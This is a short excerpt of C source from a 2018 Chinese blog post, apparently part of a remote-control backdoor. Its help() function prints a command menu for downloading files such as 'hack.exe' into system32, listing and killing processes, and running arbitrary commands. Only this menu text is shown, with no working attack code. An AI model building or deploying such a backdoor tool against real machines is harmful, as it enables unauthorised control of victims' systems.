196 void help(void)
197 {
198     printf("\n");
199     printf("[http://127.0.0.1/hack.exe -admin.exe]  (Download Files. Parth is ////system32)\n");
200     printf("[pslist]        (List the Process)\n");
201     printf("[pskill ID]     (Kill the Process)\n");
202     printf("Command         (run the command)\n"); 
203     printf("\n");
204  
205 }
View Code

 

posted @ 2018-08-09 20:15  Alkri  阅读(143)  评论(0编辑  收藏  举报